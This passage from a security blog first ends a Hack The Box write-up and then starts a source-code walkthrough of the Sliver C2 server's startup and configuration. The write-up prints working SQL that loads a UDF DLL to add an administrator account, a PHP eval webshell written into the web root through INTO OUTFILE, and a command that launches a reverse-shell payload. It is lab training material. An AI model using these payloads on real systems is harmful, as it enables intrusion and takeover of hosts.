class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># CHech the linux comments for more indications</span><br><span class="line">USE mysql;</span><br><span class="line">CREATE TABLE npn(line blob);</span><br><span class="line">INSERT INTO npn values(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll'));</span><br><span class="line">show variables like '%plugin%';</span><br><span class="line">SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';</span><br><span class="line">CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';</span><br><span class="line">SELECT sys_exec("net user npn npn12345678 /add");</span><br><span class="line">SELECT sys_exec("net localgroup Administrators npn /add");</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [outputwall]> show variables like '%secure_file_priv%';</span><br><span class="line">+------------------+-------+</span><br><span class="line">| Variable_name | Value |</span><br><span class="line">+------------------+-------+</span><br><span class="line">| secure_file_priv | |</span><br><span class="line">+------------------+-------+</span><br><span class="line">1 row in set (0.905 sec)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>G了,那个文件夹它真没有,而我的用户(m.harris)没那个写入权限,没办法进行修改</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td 
class="code"><pre><span class="line">MariaDB [mysql]> SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';</span><br><span class="line">ERROR 1 (HY000): Can't create/write to file 'C:\Program Files\Output Messenger Server\Plugins\Output\mysql\lib\plugin\lib_mysqludf_sys_32.dll' (Errcode: 2 "No such file or directory")</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>It seems the full experience on this box requires another look at <code>OutputMessengerApache.zip</code><br>The first thing that catches the eye is OutputApache.ini </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat OutputApache.ini </span><br><span class="line">[SETTINGS]</span><br><span class="line">Address=127.0.0.1</span><br><span class="line">WebPort=14126</span><br><span class="line">Version=1.0.0</span><br><span class="line"></span><br><span class="line">[NOTIFICATION]</span><br><span class="line">address=localhost</span><br><span class="line">port=8124</span><br><span class="line"></span><br><span class="line">[PATHCONFIG]</span><br><span class="line">;apache2.4.9</span><br><span class="line">Apache=apache2</span><br><span class="line">;php5.5.12</span><br><span class="line">PHP=php</span><br><span class="line">Log=log</span><br><span 
class="line">def_conf=settings</span><br><span class="line">WebRoot=www</span><br><span class="line">Backup=backup</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>First forward the port and take a look</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">portfwd add -l 14126 -L 0.0.0.0 -p 14126 -r 10.10.11.31</span><br></pre></td></tr></table></figure><p>Judging by this plain look, it probably wants me to just write a webshell<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907142601.png"></p><p>But right now I do not know where its web directory is</p><p>And I do not have permission</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"> Directory of C:\Program Files</span><br><span class="line"></span><br><span class="line">02/23/2024 06:06 AM <DIR> .</span><br><span class="line">02/23/2024 06:06 AM <DIR> ..</span><br><span class="line">12/04/2023 10:22 AM <DIR> Common Files</span><br><span class="line">08/21/2024 01:50 PM <DIR> Hyper-V</span><br><span class="line">02/19/2024 04:52 AM <DIR> internet explorer</span><br><span class="line">02/23/2024 06:06 AM <DIR> Output Messenger</span><br><span 
class="line">09/06/2024 06:17 AM <DIR> Output Messenger Server</span><br><span class="line">12/12/2023 11:04 AM <DIR> PackageManagement</span><br><span class="line">02/19/2024 05:16 AM <DIR> Update Services</span><br><span class="line">12/04/2023 10:23 AM <DIR> VMware</span><br><span class="line">11/05/2022 12:03 PM <DIR> Windows Defender</span><br><span class="line">08/21/2024 01:50 PM <DIR> Windows Defender Advanced Threat Protection</span><br><span class="line">11/05/2022 12:03 PM <DIR> Windows Mail</span><br><span class="line">08/21/2024 01:50 PM <DIR> Windows Media Player</span><br><span class="line">09/15/2018 12:19 AM <DIR> Windows Multimedia Platform</span><br><span class="line">09/15/2018 12:28 AM <DIR> windows nt</span><br><span class="line">11/05/2022 12:03 PM <DIR> Windows Photo Viewer</span><br><span class="line">09/15/2018 12:19 AM <DIR> Windows Portable Devices</span><br><span class="line">09/15/2018 12:19 AM <DIR> Windows Security</span><br><span class="line">12/12/2023 11:04 AM <DIR> WindowsPowerShell</span><br><span class="line"> 0 File(s) 0 bytes</span><br><span class="line"> 20 Dir(s) 46,382,149,632 bytes free</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>What is known so far:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Program Files\Output Messenger Server\Plugins\Output\mysql\</span><br></pre></td></tr></table></figure><p>is the mysql directory<br>Let's use mysql to read my.ini and see</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\my.ini');</span><br></pre></td></tr></table></figure><p>The read succeeded</p><p>In the extracted directory of the archive <code>OutputMessengerMysql.zip</code>, run <code>find my.ini</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ find . -name "my.ini" 2>/dev/null</span><br><span class="line">./settings/my.ini</span><br><span class="line">./mysql/my.ini</span><br><span class="line">./mysql/data/my.ini</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The most likely one here is the second</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./mysql/my.ini</span><br></pre></td></tr></table></figure><p>But to verify that this is correct<br>I will read once more</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\data\\my.ini');</span><br></pre></td></tr></table></figure><p>It worked<br>So this can be confirmed</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">C:\Program Files\Output Messenger Server\Plugins\Output\mysql\</span><br><span class="line">corresponds to</span><br><span class="line">the mysql subdirectory of the OutputMessengerMysql.zip archive</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">C:\Program Files\Output Messenger Server\Plugins\Output\ is where this zip was extracted</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\OutputMysql.ini');</span><br></pre></td></tr></table></figure><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907144147.png"></p><p>It is reasonable to suspect that the other zip, OutputMessengerApache.zip, is also extracted here</p><p>Reading OutputApache.ini is enough to verify this</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\OutputApache.ini');</span><br></pre></td></tr></table></figure><p>Guessed right, the read succeeded</p><p>So the overall path is now clear</p><p>Now just write the webshell to the www path</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php @eval($_GET['qwer']);?></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select "<?php @eval($_GET['qwer']);?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\gshell.php";</span><br></pre></td></tr></table></figure><p>Command execution did not work, frustrating, and it even crashed the box</p><p>Quickly read php.ini</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./settings/php.ini</span><br><span class="line">./php/php.ini</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\php\\php.ini');</span><br><span 
class="line"></span><br><span class="line">disable_functions in this one is empty</span><br><span class="line"></span><br><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\settings\\php.ini');</span><br><span class="line">This one is empty too???</span><br></pre></td></tr></table></figure><p>Could it be that it actually succeeded earlier and the command execution simply crashed the box, or was it bad luck and someone else happened to be resetting the box???</p><p>Never mind, I will reset the box myself and walk the whole path again</p><p>Let's simply use the most basic PHP command execution</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select "<?php echo `whoami`;?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\whoami.php";</span><br></pre></td></tr></table></figure><p>With that, we get a plain and simple <code>nt authority\system</code><br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907152646.png"><br>If you really want an msf shell, change the written PHP file to call the path of the corresponding payload, say "reverse.exe", and then meterpreter can be used happily</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select "<?php echo `path/reverse.exe`;?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\whoami.php";</span><br></pre></td></tr></table></figure><h1 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h1><p>A walkthrough of this penetration process</p><p>1. First port-scan the target and identify services to obtain the ports, domain name and host information<br>2. Then configure the DNS server to prepare for domain penetration<br>3. Collect user information from the target system and build a user wordlist<br>4. Use kerbrute to enumerate existing users<br>5. Use GetNPUsers to obtain users that do not require Kerberos pre-authentication, get a hash, and crack it with hashcat<br>6. Use the obtained credentials to get a shell and for password spraying<br>7. Use BloodHound to obtain the domain structure, analyse a usable attack path, and gain a foothold along that path<br>8. Use msf for persistence<br>9. Use PEASS-NG to enumerate possible privilege escalation paths; from the process list, find two zip archives, mysql and apache<br>10. Analyse the two archives, use port forwarding to expose the target's mysql port, and obtain database root privileges<br>11. Guess the Apache web root, write a file through mysql, and execute commands through PHP; since PHP runs as <code>nt authority\system</code>, getting the webshell yields the highest privileges.</p>]]></content>
<categories>
<category> hack-the-box </category>
</categories>
<tags>
<tag> HTB </tag>
<tag> domain penetration </tag>
</tags>
</entry>
<entry>
<title>sliver source code analysis - initialization and scaffolding</title>
<link href="/2024/08/12/sliver%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90-%E5%88%9D%E5%A7%8B%E5%8C%96%E4%BB%A5%E5%8F%8A%E8%84%9A%E6%89%8B%E6%9E%B6/"/>
<url>/2024/08/12/sliver%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90-%E5%88%9D%E5%A7%8B%E5%8C%96%E4%BB%A5%E5%8F%8A%E8%84%9A%E6%89%8B%E6%9E%B6/</url>
<content type="html"><![CDATA[<h1 id="引言"><a href="#引言" class="headerlink" title="Introduction"></a>Introduction</h1><ul><li><strong>Project overview</strong>: a source code analysis of the open-source C2 framework sliver, with the aim of learning how it works. This article analyses sliver's entry point and scaffolding, and the basic configuration files</li><li><strong>Target audience</strong>: cybersecurity enthusiasts</li></ul><h1 id="准备工作"><a href="#准备工作" class="headerlink" title="Preparation"></a>Preparation</h1><ul><li>Source code: <a href="https://github.com/BishopFox/sliver">BishopFox/sliver: Adversary Emulation Framework (github.com)</a><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/BishopFox/sliver.git</span><br></pre></td></tr></table></figure></li><li>Go language environment<br><a href="https://go.dev/doc/install">Download and install - The Go Programming Language</a></li><li>vscode<br><a href="https://code.visualstudio.com/download">Download Visual Studio Code - Mac, Linux, Windows</a></li></ul><h1 id="入口点"><a href="#入口点" class="headerlink" title="Entry point"></a>Entry point</h1><p>Since sliver is a client-server system and its main functionality lives on the server side, the analysis target is sliver-server<br>The entry point here does nothing but run cli.Execute()<br>server/main.go</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"github.com/bishopfox/sliver/server/cli"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line">cli.Execute()</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>server/cli/cli.go</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Execute - Execute root command</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Execute</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">if</span> err := rootCmd.Execute(); err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">os.Exit(<span class="number">1</span>)</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>cli.Execute() here simply runs rootCmd.Execute(), so the focus is on rootCmd</p><p>Jumping to github.com/bishopfox/sliver/server/cli, we find that the scaffolding framework it uses is github.com/spf13/cobra</p><p>If you are not familiar with cobra, you can watch this video by a Bilibili uploader<br><a href="https://www.bilibili.com/video/BV1ka4y177iK">https://www.bilibili.com/video/BV1ka4y177iK</a><br>Cobra was created by Go team member <a href="https://xie.infoq.cn/link?target=https://spf13.com/">spf13</a> for the <a href="https://xie.infoq.cn/link?target=https://gohugo.io/">Hugo</a> project and has been adopted by many popular Go projects, such as Kubernetes, Helm, Docker (distribution) and Etcd.<br>In short, it makes it easy to write command-line programs that take arguments.</p><h2 id="rootCmd"><a href="#rootCmd" class="headerlink" title="rootCmd"></a>rootCmd</h2><p>Here is part of the source of server/cli/cli.go</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> rootCmd = &cobra.Command{</span><br><span class="line">Use: <span class="string">"sliver-server"</span>,</span><br><span class="line">Short: <span class="string">""</span>,</span><br><span class="line">Long: <span class="string">``</span>,</span><br><span class="line">Run: <span class="function"><span class="keyword">func</span><span class="params">(cmd *cobra.Command, args []<span class="type">string</span>)</span></span> {</span><br><span class="line"><span class="comment">// Root command starts the server normally</span></span><br><span class="line"></span><br><span class="line">appDir := assets.GetRootAppDir() <span class="comment">//makedir $HOME/.sliver</span></span><br><span class="line">logFile := initConsoleLogging(appDir)</span><br><span class="line"><span class="keyword">defer</span> logFile.Close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">defer</span> <span 
class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">if</span> r := <span class="built_in">recover</span>(); r != <span class="literal">nil</span> {</span><br><span class="line">log.Printf(<span class="string">"panic:\n%s"</span>, debug.Stack())</span><br><span class="line">fmt.Println(<span class="string">"stacktrace from panic: \n"</span> + <span class="type">string</span>(debug.Stack()))</span><br><span class="line">os.Exit(<span class="number">99</span>)</span><br><span class="line">}</span><br><span class="line">}()</span><br><span class="line"></span><br><span class="line">assets.Setup(<span class="literal">false</span>, <span class="literal">true</span>)</span><br><span class="line">certs.SetupCAs()</span><br><span class="line">certs.SetupWGKeys()</span><br><span class="line">cryptography.AgeServerKeyPair()</span><br><span class="line">cryptography.MinisignServerPrivateKey()</span><br><span class="line">c2.SetupDefaultC2Profiles()</span><br><span class="line"></span><br><span class="line">serverConfig := configs.GetServerConfig()</span><br><span class="line">listenerJobs, err := db.ListenerJobs()</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">err = StartPersistentJobs(listenerJobs)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> serverConfig.DaemonMode {</span><br><span class="line">daemon.Start(daemon.BlankHost, daemon.BlankPort, serverConfig.DaemonConfig.Tailscale)</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">os.Args = os.Args[:<span 
class="number">1</span>] <span class="comment">// Hide cli from grumble console</span></span><br><span class="line">console.Start()</span><br><span class="line">}</span><br><span class="line">},</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Since this is rootCmd, its Use: "sliver-server" denotes the command itself. cobra reports what the command is in the output of -h and similar flags, and here that is "sliver-server".</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">└─$ sliver-server -h</span><br><span class="line">Usage://Use: <span class="string">"sliver-server"</span> refers to the example below and tells the user what this command is</span><br><span class="line"> sliver-server [flags] </span><br><span class="line"> sliver-server [<span class="built_in">command</span>]</span><br><span class="line"></span><br><span class="line">Available Commands:</span><br><span class="line"> builder Start the process as an external builder</span><br><span class="line"> completion Generate the autocompletion script <span class="keyword">for</span> the specified shell</span><br><span class="line"> daemon Force start server <span class="keyword">in</span> daemon mode</span><br><span class="line"> export-ca Export certificate authority</span><br><span class="line"> <span class="built_in">help</span> Help about any <span class="built_in">command</span></span><br><span class="line"> import-ca Import certificate authority</span><br><span class="line"> operator Generate operator configuration files</span><br><span class="line"> unpack Unpack assets and <span class="built_in">exit</span></span><br><span class="line"> version Print version and <span class="built_in">exit</span></span><br><span class="line"></span><br><span class="line">Flags:</span><br><span class="line"> -h, --<span class="built_in">help</span> <span class="built_in">help</span> <span class="keyword">for</span> sliver-server</span><br><span class="line"></span><br><span class="line">Use <span class="string">"sliver-server [command] --help"</span> <span class="keyword">for</span> more information about a <span class="built_in">command</span>.</span><br></pre></td></tr></table></figure><p><code>Run: func(cmd *cobra.Command, args []string) </code> is what this command (sliver-server) runs<br>First it executes <code>appDir := assets.GetRootAppDir()</code></p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// GetRootAppDir - Get the Sliver app dir, default is: ~/.sliver/</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetRootAppDir</span><span class="params">()</span></span> <span class="type">string</span> {</span><br><span class="line">value := os.Getenv(envVarName)</span><br><span 
class="line"><span class="keyword">var</span> dir <span class="type">string</span></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(value) == <span class="number">0</span> {</span><br><span class="line">user, _ := user.Current()</span><br><span class="line">dir = filepath.Join(user.HomeDir, <span class="string">".sliver"</span>)</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">dir = value</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> _, err := os.Stat(dir); os.IsNotExist(err) {</span><br><span class="line">err = os.MkdirAll(dir, <span class="number">0700</span>)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">setupLog.Fatalf(<span class="string">"Cannot write to sliver root dir %s"</span>, err)</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> dir</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>As the comment above shows, this creates the <code>.sliver</code> directory under the current user's home directory (unless the environment variable overrides it)</p><p>Next, <code>logFile := initConsoleLogging(appDir)</code> is executed</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Initialize logging</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">initConsoleLogging</span><span class="params">(appDir <span class="type">string</span>)</span></span> *os.File {</span><br><span 
class="line">log.SetFlags(log.LstdFlags | log.Lshortfile)</span><br><span class="line">logFile, err := os.OpenFile(filepath.Join(appDir, <span class="string">"logs"</span>, logFileName), os.O_RDWR|os.O_CREATE|os.O_APPEND, <span class="number">0</span>o600)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">log.Fatalf(<span class="string">"Error opening file: %v"</span>, err)</span><br><span class="line">}</span><br><span class="line">log.SetOutput(logFile)</span><br><span class="line"><span class="keyword">return</span> logFile</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Here <code>logFileName = "console.log"</code>, so this function opens (creating if necessary) <code>~/.sliver/logs/console.log</code> and returns that file as the variable logFile<br>Next, the following two statements are executed</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">defer</span> logFile.Close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">defer</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">if</span> r := <span class="built_in">recover</span>(); r != <span class="literal">nil</span> {</span><br><span class="line">log.Printf(<span class="string">"panic:\n%s"</span>, debug.Stack())</span><br><span class="line">fmt.Println(<span class="string">"stacktrace from panic: \n"</span> + <span class="type">string</span>(debug.Stack()))</span><br><span class="line">os.Exit(<span class="number">99</span>)</span><br><span class="line">}</span><br><span 
class="line">}()</span><br></pre></td></tr></table></figure><p>The first, <code>defer logFile.Close()</code>, closes logFile at the very end of the current function's lifetime<br>The second uses the <code>recover()</code> function to check whether a panic occurred: if no panic occurred, r is nil; if a panic did occur, the statements that follow handle it<br>Note that a deferred call is registered first and executed later, and deferred calls run in last-in, first-out order, somewhat like pushing onto a stack</p><p>This is followed by a series of initialization operations</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">assets.Setup(<span class="literal">false</span>, <span class="literal">true</span>) <span class="comment">//assets init</span></span><br><span class="line">certs.SetupCAs() <span class="comment">//ca init</span></span><br><span class="line">certs.SetupWGKeys() <span class="comment">//wireguard key init</span></span><br><span class="line">cryptography.AgeServerKeyPair() <span class="comment">//Get the server's ECC key pair</span></span><br><span class="line">cryptography.MinisignServerPrivateKey() <span class="comment">//Get the server's minisign key pair</span></span><br><span class="line">c2.SetupDefaultC2Profiles()</span><br></pre></td></tr></table></figure><p>The first, <code>assets.Setup(false, true)</code>, initializes the various assets, such as the banner shown at startup.<br><code>certs.SetupCAs() </code> initializes the CA certificates<br><code>certs.SetupWGKeys() </code> initializes the WireGuard keys<br><code>cryptography.AgeServerKeyPair() </code> initializes the ECC key pair<br><code>cryptography.MinisignServerPrivateKey()</code> initializes the minisign key pair<br><code>c2.SetupDefaultC2Profiles()</code> initializes the default C2 profiles</p><h1 id="配置文件"><a href="#配置文件" class="headerlink" title="Configuration files"></a>Configuration files</h1><h2 id="server-json"><a href="#server-json" class="headerlink" title="server.json"></a>server.json</h2><p>First is the server-side configuration file</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">serverConfig := configs.GetServerConfig()</span><br></pre></td></tr></table></figure><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetServerConfig</span><span class="params">()</span></span> *ServerConfig {</span><br><span class="line">configPath := GetServerConfigPath()</span><br><span class="line">config := getDefaultServerConfig()</span><br><span class="line">.....</span><br><span class="line"><span class="comment">// the rest reads the JSON config file at configPath, parses it into config, and uses and saves it</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// GetServerConfigPath - File path to config.json</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetServerConfigPath</span><span class="params">()</span></span> <span class="type">string</span> {</span><br><span class="line">appDir := assets.GetRootAppDir()</span><br><span class="line">serverConfigPath := filepath.Join(appDir, <span class="string">"configs"</span>, serverConfigFileName)</span><br><span class="line">serverConfigLog.Debugf(<span class="string">"Loading config from %s"</span>, serverConfigPath)</span><br><span class="line"><span class="keyword">return</span> serverConfigPath</span><br><span 
